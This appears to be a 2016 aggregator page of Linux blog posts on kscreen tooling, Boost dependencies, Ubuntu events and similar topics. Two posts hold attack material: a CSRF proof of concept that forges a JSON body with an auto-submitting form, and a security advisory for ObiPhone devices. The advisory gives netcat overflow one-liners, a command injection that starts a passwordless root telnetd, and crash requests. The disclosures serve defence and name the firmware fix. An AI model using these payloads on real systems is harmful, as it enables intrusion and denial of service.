So much for the theory. In reality, we’re dealing with a huge amount of complexity. There are hardware events such as suspending, waking up with different configurations, the laptop’s lid may be closed or opened (and when that’s done, we don’t even get an event that it closed, displays come and go, depending on their connection, the same piece of hardware might support completely different resolutions, hardware comes with broken EDID information, display connectors come and go, so do display controllers (crtcs); and on top of all that: the only way we get to know what actually works in reality for the user is the “throw stuff against the wall and observe what sticks” tactic.

This is the fabric of nightmares. Since I prefer to not sleep, but hack at night, I seemed to be the right person to send into this battle. (Coincidentally, I was also “crowned” kscreen maintainer a few months ago, but let’s stick to drama here.)

So, anyway, as I already mentioned in an earlier blog entry, we had some problems restoring configurations. In certain situations, displays weren’t enabled or positioned unreliably, or kscreen failed to restore configurations altogether, making it “forget” settings.
kscreen-doctor

Better tools

Debugging these issues is not entirely trivial. We need to figure out at which level they happen (for example in our xrandr implementation, in other parts of the library, or in the daemon. We also need to figure out what happens exactly, and when it does. A complex architecture like this brings a number of synchronization problems with it, and these are hard to debug when you have to figure out what exactly goes on across log files. In Plasma 5.8, kscreen will log its activity into one consolidated, categorized and time-stamped log. This rather simple change has already been a huge help in getting to know what’s really going on, and it has helped us identify a number of problems.

A tool which I’ve been working on is kscreen-doctor. On the one hand, I needed a debugging helper tool that can give system information useful for debugging. Perhaps more importantly I know I’d be missing a command-line tool to futz around with screen configurations from the command-line or from scripts as Wayland arrives. kscreen-doctor allows to change the screen configuration at runtime, like this:

Disable the hdmi output, enable the laptop panel and set it to a specific mode
$ kscreen-doctor output.HDMI-2.disable output.eDP-1.mode.1 output.eDP-1.enable

Position the hdmi monitor on the right of the laptop panel
$ kscreen-doctor output.HDMI-2.position.0,1280 output.eDP-1.position.0,0

Please note that kscreen-doctor is quite experimental. It’s a tool that allows to shoot yourself in the foot, so user discretion is advised. If you break things, you get to keep the pieces. I’d like to develop this into a more stable tool in kscreen, but for now: don’t complain if it doesn’t work or eat your hamster.

Another neat testing tool is Wayland. The video wall configuration you see in the screenshot is unfortunately not real hardware I have around here. What I’ve done instead is run a Wayland server with these “virtual displays” connected, which in turn allowed me to reproduce a configuration issue. I’ll spare you the details of what exactly went wrong, but this kind of tricks allows us to reproduce problems with much more hardware than I ever want or need in my office. It doesn’t stop there, I’ve added this hardware configuration to our unit-testing suite, so we can make sure that this case is covered and working in the future.

on August 24, 2016 01:16 PM

A coworker and I were looking at an application today that, like so many other modern web applications, offers a RESTful API with JSON being used for serialization of requests/responses. She noted that the application didn’t include any sort of CSRF token and didn’t seem to use any of the headers (X-Requested-With, Referer, Origin, etc.) as a “poor man’s CSRF token”, but since it was posting JSON, was it really vulnerable to CSRF? Yes, yes, definitely yes!

The idea that the use of a particular encoding is a security boundary is, at worst, a completely wrong notion of security, and at best, a stopgap until W3C, browser vendors, or a clever attacker gets hold of your API. Let’s examine JSON encoding as a protection against CSRF and demonstrate a mini-PoC.

The Application

We have a basic application written in Go. Authentication checking is elided for post size, but this is not just an unauthenticated endpoint.

package main

import (
	"encoding/json"
	"fmt"
	"net/http"
)

type Secrets struct {
	Secret int
}

var storage Secrets

func handler(w http.ResponseWriter, r *http.Request) {
	if r.Method == "POST" {
		json.NewDecoder(r.Body).Decode(&storage)
	}
	fmt.Fprintf(w, "The secret is %d", storage.Secret)
}

func main() {
	http.HandleFunc("/", handler)
	http.ListenAndServe(":8080", nil)
}

As you can see, it basically serves a secret number that can be updated via HTTP POST of a JSON object. If we attempt a URL-encoded or multipart POST, the JSON decoding fails miserably and the secret remains unchanged. We must POST JSON in order to get the secret value changed.

Exploring Options

So let’s explore our options here. The site can locally use AJAX via the XMLHTTPRequest API, but due to the Same-Origin Policy, an attacker’s site cannot use this. For most CSRF, the way to get around this is plain HTML forms, since form submission is not subject to the Same-Origin Policy. The W3C had a draft specification for JSON forms, but that has been abandoned since late 2015, and isn’t supported in any browsers. There are probably some techniques that can make use of Flash or other browser plugins (aren’t there always?) but it can even be done with basic forms, it just takes a little work.

JSON in Forms

Normally, if we try to POST JSON as, say, a form value, it ends up being URL encoded, not to mention including the field name.

<form method='POST'>
  <input name='json' value='{"foo": "bar"}'>
  <input type='submit'>
</form>

Results in a POST body of:

json=%7B%22foo%22%3A+%22bar%22%7D

Good luck decoding that as JSON!

Doing it as the form field name doesn’t get any better.

%7B%22foo%22%3A+%22bar%22%7D=value

It turns out you can set the enctype of your form to text/plain and avoid the URL encoding on the form data. At this point, you’ll get something like:

json={"foo": "bar"}

Unfortunately, we still have to contend with the form field name and the separator (=). This is a simple matter of splitting our payload across both the field name and value, and sticking the equals sign in an unused field. (Or you can use it as part of your payload if you need one.)

Putting it All Together

<body onload='document.forms[0].submit()'>
  <form method='POST' enctype='text/plain'>
    <input name='{"secret": 1337, "trash": "' value='"}'>
  </form>
</body>

This results in a request body of:

{"secret": 1337, "trash": "="}

This parses just fine and updates our secret!

on August 24, 2016 07:00 AM

August 23, 2016

Razer Hardware on Linux

Aaron Honeycutt

One of the things that stopped me from moving to Ubuntu Linux full time on my desktop was the lack of support for my Razer Blackwidow Chroma. For those who do not know about it: pretty link . It is a very pretty keyboard with every key programmable to be a different color or effect. I found a super cool program on github to make it work on Ubuntu/Linux Mint, Debian and a few others maybe since the source is available here: source link

Here is what the application looks like:
polychromatic-ss1

It even has a tray applet to change the colors, and effects quickly.

on August 23, 2016 08:40 PM

August 22, 2016

Ubuntu in Philadelphia

Elizabeth K. Joseph

Last week I traveled to Philadelphia to spend some time with friends and speak at FOSSCON. While I was there, I noticed a Philadelphia area Linux Users Group (PLUG) meeting would land during that week and decided to propose a talk on Ubuntu 16.04.

But first I happened to be out getting my nails done with a friend on Sunday before my talk. Since I was there, I decided to Ubuntu theme things up again. Drawing freehand, the manicurist gave me some lovely Ubuntu logos.

Girly nails aside, that’s how I ended up at The ATS Group on Monday evening for a PLUG West meeting. They had a very nice welcome sign for the group. Danita and I arrived shortly after 7PM for the Q&A portion of the meeting. This pre-presentation time gave me the opportunity to pass around my BQ Aquaris M10 tablet running Ubuntu. After the first unceremonious pass, I sent it around a second time with more of an introduction, and the Bluetooth keyboard and mouse combo so people could see convergence in action by switching between the tablet and desktop view. Unlike my previous presentations, I was traveling so I didn’t have my bag of laptops and extra tablet, so that was the extent of the demos.

The meeting was very well attended and the talk went well. It was nice to have folks chiming in on a few of the topics (like the transition to systemd) and there were good questions. I also was able to give away a copy of our The Official Ubuntu Book, 9th Edition to an attendee who was new to Ubuntu.

Keith C. Perry shared a video of the talk on G+ here. Slides are similar to past talks, but I added a couple since I was presenting on a Xubuntu system (rather than Ubuntu) and didn’t have pure Ubuntu demos available: slides (7.6M PDF, lots of screenshots).

After the meeting we all had an enjoyable time at The Office, which I hadn’t been to since moving away from Philadelphia almost seven years ago.

Thanks again to everyone who came out, it was nice to meet a few new folks and catch up with a bunch of people I haven’t seen in several years.

Saturday was FOSSCON! The Ubuntu Pennsylvania LoCo team showed up to have a booth, staffed by long time LoCo member Randy Gold.

They had Ubuntu demos, giveaways from the Ubuntu conference pack (lanyards, USB sticks, pins) and I dropped off a copy of the Ubuntu book for people to browse, along with some discount coupons for folks who wanted to buy it. My Ubuntu tablet also spent time at the table so people could play around with that.


Thanks to Randy for the booth photo!

At the conference closing, we had three Ubuntu books to raffle off! They seemed to go to people who appreciated them and since both José and I attended the conference, the raffle winners had 2/3 of the authors there to sign the books.


My co-author, José Antonio Rey, signing a copy of our book!
on August 22, 2016 07:53 PM

Note that this a duplicate of the advisory sent to the full-disclosure mailing list.

Introduction

Multiple vulnerabilities were discovered in the web management interface of the ObiHai ObiPhone products. The Vulnerabilities were discovered during a black box security assessment and therefore the vulnerability list should not be considered exhaustive.

Affected Devices and Versions

ObiPhone 1032/1062 with firmware less than 5-0-0-3497.

Vulnerability Overview

Obi-1. Memory corruption leading to free() of an attacker-controlled address
Obi-2. Command injection in WiFi Config
Obi-3. Denial of Service due to buffer overflow
Obi-4. Buffer overflow in internal socket handler
Obi-5. Cross-site request forgery
Obi-6. Failure to implement RFC 2617 correctly
Obi-7. Invalid pointer dereference due to invalid header
Obi-8. Null pointer dereference due to malicious URL
Obi-9. Denial of service due to invalid content-length

Vulnerability Details

Obi-1. Memory corruption leading to free() of an attacker-controlled address

By providing a long URI (longer than 256 bytes) not containing a slash in a request, a pointer is overwritten which is later passed to free(). By controlling the location of the pointer, this would allow an attacker to affect control flow and gain control of the application. Note that the free() seems to occur during cleanup of the request, as a 404 is returned to the user before the segmentation fault.

python -c 'print "GET " + "A"*257 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0  0x479d8b18 in free () from root/lib/libc.so.6
#1  0x00135f20 in ?? ()
(gdb) x/5i $pc
=> 0x479d8b18 <free+48>:        ldr     r3, [r0, #-4]
   0x479d8b1c <free+52>:        sub     r5, r0, #8
   0x479d8b20 <free+56>:        tst     r3, #2
   0x479d8b24 <free+60>:        bne     0x479d8bec <free+260>
   0x479d8b28 <free+64>:        tst     r3, #4
(gdb) i r r0
r0             0x41     65

Obi-2. Command injection in WiFi Config

An authenticated user (including the lower-privileged “user” user) can enter a hidden network name similar to “$(/usr/sbin/telnetd &)”, which starts the telnet daemon.

GET /wifi?checkssid=$(/usr/sbin/telnetd%20&) HTTP/1.1
Host: foo
Authorization: [omitted]

Note that telnetd is now running and accessible via user “root” with no password.

Obi-3. Denial of Service due to buffer overflow

By providing a long URI (longer than 256 bytes) beginning with a slash, memory is overwritten beyond the end of mapped memory, leading to a crash. Though no exploitable behavior was observed, it is believed that memory containing information relevant to the request or control flow is likely overwritten in the process. strcpy() appears to write past the end of the stack for the current thread, but it does not appear that there are saved link registers on the stack for the devices under test.

python -c 'print "GET /" + "A"*256 + " HTTP/1.1\nHost: foo"' | nc IP 80

(gdb) bt
#0  0x479dc440 in strcpy () from root/lib/libc.so.6
#1  0x001361c0 in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) x/5i $pc
=> 0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
   0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
   0x479dc448 <strcpy+24>:      bx      lr
   0x479dc44c <strcspn>:        push    {r4, r5, r6, lr}
   0x479dc450 <strcspn+4>:      ldrb    r3, [r0]
(gdb) i r r1 r2
r1             0xb434df01       3023363841
r2             0xff     255
(gdb) p/x $r1+$r2
$1 = 0xb434e000

Obi-4. Buffer overflow in internal socket handler

Commands to be executed by realtime backend process obid are sent via Unix domain sockets from obiapp. In formatting the message for the Unix socket, a new string is constructed on the stack. This string can overflow the static buffer, leading to control of program flow. The only vectors leading to this code that were discovered during the assessment were authenticated, however unauthenticated code paths may exist. Note that the example command can be executed as the lower-privileged “user” user.

GET /wifi?checkssid=[A*1024] HTTP/1.1
Host: foo
Authorization: [omitted]

(gdb) 
#0  0x41414140 in ?? ()
#1  0x0006dc78 in ?? ()

Obi-5. Cross-site request forgery

All portions of the web interface appear to lack any protection against Cross-Site Request Forgery. Combined with the command injection vector in ObiPhone-3, this would allow a remote attacker to execute arbitrary shell commands on the phone, provided the current browser session was logged-in to the phone.

Obi-6. Failure to implement RFC 2617 correctly

RFC 2617 specifies HTTP digest authentication, but is not correctly implemented on the ObiPhone. The HTTP digest authentication fails to comply in the following ways:

  • The URI is not validated
  • The application does not verify that the nonce received is the one it sent
  • The application does not verify that the nc value does not repeat or go backwards

    GET / HTTP/1.1 Host: foo Authorization: Digest username=”admin”, realm=”a”, nonce=”a”, uri=”/”, algorithm=MD5, response=”309091eb609a937358a848ff817b231c”, opaque=””, qop=auth, nc=00000001, cnonce=”a” Connection: close

    HTTP/1.1 200 OK Server: OBi110 Cache-Control:must-revalidate, no-store, no-cache Content-Type: text/html Content-Length: 1108 Connection: close

Please note that the realm, nonce, cnonce, and nc values have all been chosen and the response generated offline.

Obi-7. Invalid pointer dereference due to invalid header

Sending an invalid HTTP Authorization header, such as “Authorization: foo”, causes the program to attempt to read from an invalid memory address, leading to a segmentation fault and reboot of the device. This requires no authentication, only access to the network to which the device is connected.

GET / HTTP/1.1
Host: foo
Authorization: foo

This causes the server to dereference the address 0xFFFFFFFF, presumably returned as a -1 error code.

(gdb) bt
#0  0x479dc438 in strcpy () from root/lib/libc.so.6
#1  0x00134ae0 in ?? ()
(gdb) x/5i $pc
=> 0x479dc438 <strcpy+8>:       ldrb    r3, [r1, #1]!
   0x479dc43c <strcpy+12>:      cmp     r3, #0
   0x479dc440 <strcpy+16>:      strb    r3, [r1, r2]
   0x479dc444 <strcpy+20>:      bne     0x479dc438 <strcpy+8>
   0x479dc448 <strcpy+24>:      bx      lr
(gdb) i r r1
r1             0xffffffff       4294967295

Obi-8. Null pointer dereference due to malicious URL

If the /obihai-xml handler is requested without any trailing slash or component, this leads to a null pointer dereference, crash, and subsequent reboot of the phone. This requires no authentication, only access to the network to which the device is connected.

GET /obihai-xml HTTP/1.1
Host: foo

(gdb) bt
#0  0x479dc7f4 in strlen () from root/lib/libc.so.6
Backtrace stopped: Cannot access memory at address 0x8f6
(gdb) info frame
Stack level 0, frame at 0xbef1aa50:
pc = 0x479dc7f4 in strlen; saved pc = 0x171830
Outermost frame: Cannot access memory at address 0x8f6
Arglist at 0xbef1aa50, args: 
Locals at 0xbef1aa50, Previous frame's sp is 0xbef1aa50
(gdb) x/5i $pc
=> 0x479dc7f4 <strlen+4>:       ldr     r2, [r1], #4
   0x479dc7f8 <strlen+8>:       ands    r3, r0, #3
   0x479dc7fc <strlen+12>:      rsb     r0, r3, #0
   0x479dc800 <strlen+16>:      beq     0x479dc818 <strlen+40>
   0x479dc804 <strlen+20>:      orr     r2, r2, #255    ; 0xff
(gdb) i r r1
r1             0x0      0

Obi-9. Denial of service due to invalid content-length

Content-Length headers of -1, -2, or -3 result in a crash and device reboot. This does not appear exploitable to gain execution. Larger (more negative) values return a page stating “Firmware Update Failed” though it does not appear any attempt to update the firmware with the posted data occurred.

POST / HTTP/1.1
Host: foo
Content-Length: -1

Foo

This appears to write a constant value of 0 to an address controlled by the Content-Length parameter, but since it appears to be relative to a freshly mapped page of memory (perhaps via mmap() or malloc()), it does not appear this can be used to gain control of the application.

(gdb) bt
#0  0x00138250 in HTTPD_msg_proc ()
#1  0x00070138 in ?? ()
(gdb) x/5i $pc
=> 0x138250 <HTTPD_msg_proc+396>:       strb    r1, [r3, r2]
  0x138254 <HTTPD_msg_proc+400>:       ldr     r1, [r4, #24]
  0x138258 <HTTPD_msg_proc+404>:       ldr     r0, [r4, #88]   ; 0x58
  0x13825c <HTTPD_msg_proc+408>:       bl      0x135a98
  0x138260 <HTTPD_msg_proc+412>:       ldr     r0, [r4, #88]   ; 0x58
(gdb) i r r3 r2
r3             0xafcc7000       2949410816
r2             0xffffffff       4294967295

Mitigation

Upgrade to Firmware 5-0-0-3497 (5.0.0 build 3497) or newer.

Author

The issues were discovered by David Tomaschik of the Google Security Team.

Timeline

  • 2016/05/12 - Reported to ObiHai
  • 2016/05/12 - Findings Acknowledged by ObiHai
  • 2016/05/20 - ObiHai reports working on patches for most issues
  • 2016/06/?? - New Firmware posted to ObiHai Website
  • 2016/08/18 - Public Disclosure
on August 22, 2016 07:00 AM

A few weeks ago, I hacked up go-wmata, some golang bindings to the WMATA API. This is super handy if you are in the DC area, and want to interface to the WMATA data.

As a proof of concept, I wrote a yo bot called @WMATA, where it returns the closest station if you Yo it your location. For hilarity, feel free to Yo it from outside DC.

For added fun, and puns, I wrote a dbus proxy for the API as weel, at wmata-dbus, so you can query the next train over dbus. One thought was to make a GNOME Shell extension to tell me when the next train is. I’d love help with this (or pointers on how to learn how to do this right).

on August 22, 2016 02:16 AM

August 21, 2016

Recently I generated diagrams showing the header dependencies between Boost libraries, or rather, between various Boost git repositories. Diagrams showing dependencies for each individual Boost git repo are here along with dot files for generating the images.

The monster diagram is here:

Edges and Incidental Modules and Packages

The directed edges in the graphs represent that a header file in one repository #includes a header file in the other repository. The idea is that, if a packager wants to package up a Boost repo, they can’t assume anything about how the user will use it. A user of Boost.ICL can choose whether ICL will use Boost.Container or not by manipulating the ICL_USE_BOOST_MOVE_IMPLEMENTATION preprocessor macro. So, the packager has to list Boost.Container as some kind of dependency of Boost.ICL, so that when the package manager downloads the boost-icl package, the boost-container package is automatically downloaded too. The dependency relationship might be a ‘suggests’ or ‘recommends’, but the edge will nonetheless exist somehow.

In practice, packagers do not split Boost into packages like that. At least for debian packages they split compiled static libraries into packages such as libboost-serialization1.58, and put all the headers (all header-only libraries) into a single package libboost1.58-dev. Perhaps the reason for packagers putting it all together is that there is little value in splitting the header-only repository content in the monolithic Boost from each other if it will all be packaged anyway. Or perhaps the sheer number of repositories makes splitting impractical. This is in contrast to KDE Frameworks, which does consider such edges and dependency graph size when determining where functionality belongs. Typically KDE aims to define the core functionality of a library on its own in a loosely coupled way with few dependencies, and then add integration and extension for other types in higher level libraries (if at all).

Another feature of my diagrams is that repositories which depend circularly on each other are grouped together in what I called ‘incidental modules‘. The name is inspired by ‘incidental data structures’ which Sean Parent describes in detail in one of his ‘Better Code’ talks. From a packager point of view, the Boost.MPL repo and the Boost.Utility repo are indivisible because at least one header of each repo includes at least one header of the other. That is, even if packagers wanted to split Boost headers in some way, the ‘incidental modules’ would still have to be grouped together into larger packages.

As far as I am aware such circular dependencies don’t fit with Standard C++ Modules designs or the design of Clang Modules, but that part of C++ would have to become more widespread before Boost would consider their impact. There may be no reason to attempt to break these ‘incidental modules’ apart if all that would do is make some graphs nicer, and it wouldn’t affect how Boost is packaged.

My script for generating the dependency information is simply grepping through the include/ directory of each repository and recording the #included files in other repositories. This means that while we know Boost.Hana can be used stand-alone, if a packager simply packages up the include/boost/hana directory, the result will have dependencies on parts of Boost because Hana includes code for integration with existing Boost code.

Dependency Analysis and Reduction

One way of defining a Boost library is to consider the group of headers which are gathered together and documented together to be a library (there are other ways which some in Boost prefer – it is surprisingly fuzzy). That is useful for documentation at least, but as evidenced it appears to not be useful from a packaging point of view. So, are these diagrams useful for anything?

While Boost header-only libraries are not generally split in standard packaging systems, the bcp tool is provided to allow users to extract a subset of the entire Boost distribution into a user-specified location. As far as I know, the tool scans header files for #include directives (ignoring ifdefs, like a packager would) and gathers together all of the transitively required files. That means that these diagrams are a good measure of how much stuff the bcp tool will extract.

Note also that these edges do not contribute time to your slow build – reducing edges in the graphs by moving files won’t make anything faster. Rewriting the implementation of certain things might, but that is not what we are talking about here.

I can run the tool to generate a usable Boost.ICL which I can easily distribute. I delete the docs, examples and tests from the ICL directory because they make up a large chunk of the size. Such a ‘subset distribution’ doesn’t need any of those. I also remove 3.5M of preprocessed files from MPL. I then need to define BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS when compiling, which is easy and explained at the end:

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf boostdir/libs/icl/{doc,test,example}
$ rm -rf boostdir/boost/mpl/aux_/preprocessed
$ du -hs myicl/
15M     myicl/

Ok, so it’s pretty big. Looking at the dependency diagram for Boost.ICL you can see an arrow to the ‘incidental spirit’ module. Looking at the Boost.Spirit dependency diagram you can see that it is quite large.

Why does ICL depend on ‘incidental spirit’? Can that dependency be removed?

For those ‘incidental modules’, I selected one of the repositories within the group and named the group after that one repository. Too see why ICL depends on ‘incidental spirit’, we have to examine all 5 of the repositories in the group to check if it is the one responsible for the dependency edge.

boost/libs/icl$ git grep -Pl -e include --and \
  -e "thread|spirit|pool|serial|date_time" include/
include/boost/icl/gregorian.hpp
include/boost/icl/ptime.hpp

Formatting wide terminal output is tricky in a blog post, so I had to make some compromises in the output here. Those ICL headers are including Boost.DateTime headers.

I can further see that gregorian.hpp and ptime.hpp are ‘leaf’ files in this analysis. Other files in ICL do not include them.

boost/libs/icl$ git grep -l gregorian include/
include/boost/icl/gregorian.hpp
boost/libs/icl$ git grep -l ptime include/
include/boost/icl/ptime.hpp

As it happens, my ICL-using code also does not need those files. I’m only using icl::interval_set<double> and icl::interval_map<double>. So, I can simply delete those files.

boost/libs/icl$ git grep -l -e include \
  --and -e date_time include/boost/icl/ | xargs rm
boost/libs/icl$

and run the bcp tool again.

$ bcp --boost=$HOME/dev/src/boost icl myicl
$ rm -rf myicl/libs/icl/{doc,test,example}
$ rm -rf myicl/boost/mpl/aux_/preprocessed
$ du -hs myicl/
12M     myicl/

I’ve saved 3M just by understanding the dependencies a bit. Not bad!

Mostly the size difference is accounted for by no longer extracting boost::mpl::vector, and secondly the Boost.DateTime headers themselves.

The dependencies in the graph are now so few that we can consider them and wonder why they are there and can they be removed. For example, there is a dependency on the Boost.Container repository. Why is that?

include/boost/icl$ git grep -C2 -e include \
   --and -e boost/container
#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <set>
--

#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/map.hpp>
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <map>
--

#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
#   include <boost/container/set.hpp>
#elif defined(ICL_USE_STD_IMPLEMENTATION)
#   include <set>

So, Boost.Container is only included if the user defines ICL_USE_BOOST_MOVE_IMPLEMENTATION, and otherwise not. If we were talking about C++ code here we might consider this a violation of the Interface Segregation Principle, but we are not, and unfortunately the realities of the preprocessor mean this kind of thing is quite common.

I know that I’m not defining that and I don’t need Boost.Container, so I can hack the code to remove those includes, eg:

index 6f3c851..cf22b91 100644
--- a/include/boost/icl/map.hpp
+++ b/include/boost/icl/map.hpp
@@ -12,12 +12,4 @@ Copyright (c) 2007-2011:
 
-#if defined(ICL_USE_BOOST_MOVE_IMPLEMENTATION)
-#   include <boost/container/map.hpp>
-#   include <boost/container/set.hpp>
-#elif defined(ICL_USE_STD_IMPLEMENTATION)
 #   include <map>
 #   include <set>
-#else // Default for implementing containers
-#   include <map>
-#   include <set>
-#endif

This and following steps don’t affect the filesystem size of the result. However, we can continue to analyze the dependency graph.

I can break apart the ‘incidental fusion’ module by deleting the iterator/zip_iterator.hpp file, removing further dependencies in my custom Boost.ICL distribution. I can also delete the iterator/function_input_iterator.hpp file to remove the dependency on Boost.FunctionTypes. The result is a graph which you can at least reason about being used in an interval tree library like Boost.ICL, quite apart from our starting point with that library.

You might shudder at the thought of deleting zip_iterator if it is an essential tool to you. Partly I want to explore in this blog post what will be needed from Boost in the future when we have zip views from the Ranges TS or use the existing ranges-v3 directly, for example. In that context, zip_iterator can go.

Another feature of the bcp tool is that it can scan a set of source files and copy only the Boost headers that are included transitively. If I had used that, I wouldn’t need to delete the ptime.hpp or gregorian.hpp etc because bcp wouldn’t find them in the first place. It would still find the Boost.Container etc includes which appear in the ICL repository however.

In this blog post, I showed an alternative approach to the bcp --scan attempt at minimalism. My attempt is to use bcp to export useful and as-complete-as-possible libraries. I don’t have a lot of experience with bcp, but it seems that in scanning mode I would have to re-run the tool any time I used an ICL header which I had not used before. With the modular approach, it would be less-frequently necessary to run the tool (only when directly using a Boost repository I hadn’t used before), so it seemed an approach worth exploring the limitations of.

Examining Proposed Standard Libraries

We can also examine other Boost repositories, particularly those which are being standardized by newer C++ standards because we know that any, variant and filesystem can be implemented with only standard C++ features and without Boost.

Looking at Boost.Variant, it seems that use of the Boost.Math library makes that graph much larger. If we want Boost.Variant without all of that Math stuff, one thing we can choose to do is copy the one math function that Variant uses, static_lcm, into the Variant library (or somewhere like Boost.Core or Boost.Integer for example). That does cause a significant reduction in the dependency graph.

Further, I can remove the hash_variant.hpp file to remove the Boost.Functional dependency:

I don’t know if C++ standardized variant has similar hashing functionality or how it is implemented, but it is interesting to me how it affects the graph.

Using a bcp-extracted library with Modern CMake

After extracting a library or set of libraries with bcp, you might want to use the code in a CMake project. Here is the modern way to do that:

add_library(boost_mpl INTERFACE)
target_compile_definitions(boost_mpl INTERFACE
    BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS
)
target_include_directories(boost_mpl INTERFACE 
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl"
)

add_library(boost_icl INTERFACE)
target_link_libraries(boost_icl INTERFACE boost_mpl)
target_include_directories(boost_icl INTERFACE 
    "${CMAKE_CURRENT_SOURCE_DIR}/myicl/libs/icl/include"
)
add_library(boost::icl ALIAS boost_icl)
#

Boost ships a large chunk of preprocessed headers for various compilers, which I mentioned above. The reasons for that are probably historical and obsolete, but they will remain and they are used by default when using GCC and that will not change. To diverge from that default it is necessary to set the BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS preprocessor macro.

By defining an INTERFACE boost_mpl library and setting its INTERFACE target_compile_definitions, any user of that library gets that magic BOOST_MPL_CFG_NO_PREPROCESSED_HEADERS define when compiling its sources.

MPL is just an internal implementation detail of ICL though, so I won’t have any of my CMake targets using MPL directly. Instead I additionally define a boost_icl INTERFACE library which specifies an INTERFACE dependency on boost_mpl with target_link_libraries.

The last ‘modern’ step is to define an ALIAS library. The alias name is boost::icl and it aliases the boost_icl library. To CMake, the following two commands generate an equivalent buildsystem:

target_link_libraries(myexe boost_icl)
target_link_libraries(myexe boost::icl)
#

Using the ALIAS version has a different effect however: If the boost::icl target does not exist an error will be issued at CMake time. That is not the case with the boost_icl version. It makes sense to use target_link_libraries with targets with :: in the name and ALIAS makes that possible for any library.


on August 21, 2016 08:48 PM

Si eres una persona que te gusta utilizar WordPress y te llega a salir este pequeño detalle (Abort Class-pclzip.php : Missing Zlib) cuando estás importante un Slider de Revolution Slider, no te preocupes, la solución es la siguiente:

  1. Debes editar el archivo que se encuentra dentro de la carpeta wp-admin/includes/: sudo nano /carpetadondeseencuentresusitio/wp-admin/includes/class-pclzip.php
  2. Encontrar la linea if (!function_exists(‘gzopen’)) y reemplazar gzopen por gzopen64.

Con ese pequeño cambio podrás seguir utilizando sin ningún problema el plugin.

Ahora, ¿Porqué da ese error?, en las últimas versiones de Ubuntu gzopen (función de PHP que nos permite abrir un archivo comprimido en .gz), solo está incluido para arquitectura de 64bits, es por esta razón que es necesario reemplazar gzopen por gzopen64 para que podamos importar todos esos archivos que se encuentran comprimido a través de este tipo de formato.

Happy Hacking!


on August 21, 2016 05:37 PM

Help a friend?

Valorie Zimmerman

Hello, if you are reading this, and have a some extra money, consider helping out a young friend of mine whose mother needs a better defense attorney.

In India, where they live, the resources all seem stacked against her. I've tried to help, and hope you will too.

Himanshu says, Hi, I recently started an online crowd funding campaign to help my mother with legal funds who is in the middle of divorce and domestic violence case.

 https://www.ketto.org/mother

Please support and share this message. Thanks.
on August 21, 2016 07:55 AM

August 18, 2016



Thanks to the Ubuntu Community Fund, I'm able to fly to Berlin and attend, and volunteer too. Thanks so much, Ubuntu community for backing me, and to the KDE e.V. and KDE community for creating and running Akademy.

This year, Akademy is part of Qtcon, which should be exciting. Lots of our friends will be there, from KDAB, VLC, Qt and FSFE. And of course Kubuntu will do our annual face-to-face meeting, with as many of us as can get to Berlin. It should be hot, exhausting, exciting, fun, and hard work, all rolled together in one of the world's great cities.

Today we got the news that Canonical has become a KDE e.V. Patron. This is most welcome news, as the better the cooperation between distributions and KDE, the better software we all have. This comes soon after SuSE's continuing support was affirmed on the growing list of Patrons.

Freedom and generosity is what it's all about!
on August 18, 2016 11:17 PM

I’ve made some changes to the Plasma 5.8 release schedule.  We had a request from our friends at openSUSE to bring the release sooner by a couple of weeks so they could sneak it into their release and everyone could enjoy the LTS goodness.  As openSUSE are long term supporters and contributors to KDE as well as patrons of KDE the Plasma team chatted and decided to slide the dates around to help out.  Release is now on the first Tuesday in October.

 

Facebooktwittergoogle_pluslinkedinby feather
on August 18, 2016 09:14 PM

S09E25 – Golden Keys - Ubuntu Podcast

Ubuntu Podcast from the UK LoCo

It’s Episode Twenty-five of Season Nine of the Ubuntu Podcast! Alan Pope, Mark Johnson, Laura Cowen and Martin Wimpress are connected and speaking to your brain.

We’re here again!

In this week’s show:

That’s all for this week! If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to show@ubuntupodcast.org or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

on August 18, 2016 02:00 PM
This has been extended to 30 August 2016 at 19 UTC. The Lubuntu team needs your feedback! We would like to get your input on a poll we have created to gauge your usage of the Lubuntu images. Your feedback is essential in making sure we make the right decision going forward! The poll is […]
on August 18, 2016 01:16 AM

August 17, 2016

Recently I have been working on the visual design for RCS (which stands for rich communications service) group chat. While working on the “Group Info” screen, we found ourselves wondering what the best way to display an online/offline status. Some of us thought text would be more explicit but others thought  it adds more noise to the screen. We decided that we needed some real data in order to make the best decision.

Usually our user testing is done by a designated Researcher but usually their plates are full and projects bigger, so I decided to make my first foray into user testing. I got some tips from designers who had more experience with user testing on our cloud team; Maria  Vrachni, Carla Berkers and Luca Paulina.

I then set about finding my user testing group. I chose 5 people to start with because you can uncover up to 80% of usability issues from speaking to 5 people. I tried to recruit a range of people to test with and they were:

  1. Billy: software engineer, very tech savvy and tech enthusiast.
  2. Magda: Our former PM and very familiar with our product and designs.
  3. Stefanie: Our Office Manager who knows our products but not so familiar with our designs.
  4. Rodney: Our IS Associate who is tech savvy but not familiar with our design work
  5. Ben: A copyeditor who has no background in tech or design and a light phone user.

The tool I decided to use was Invision. It has a lot of good features and I already had some experience creating lightweight prototypes with it. I made four minimal prototypes where the group info screen had a mixture of dots vs text to represent online status and variations on placement.  I then put these on my phone so my test subjects could interact with it and feel like they were looking at a full fledged app and have the same expectations.

group_chat_testing

During testing, I made sure not to ask my subjects any leading questions. I only asked them very broad questions like “Do you see everything you expect to on this page?” “Is anything unclear?” etc. When testing, it’s important not to lead the test subjects so they can be as objective as possible. Keeping this in mind, it was interesting to to see what the testers noticed and brought up on their own and what patterns arise.

My findings were as follows:

Online status: Text or Green Dot

